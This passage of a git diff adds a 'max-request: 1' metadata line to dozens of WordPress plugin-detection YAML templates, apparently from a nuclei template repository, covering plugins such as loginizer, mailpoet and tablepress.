a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml 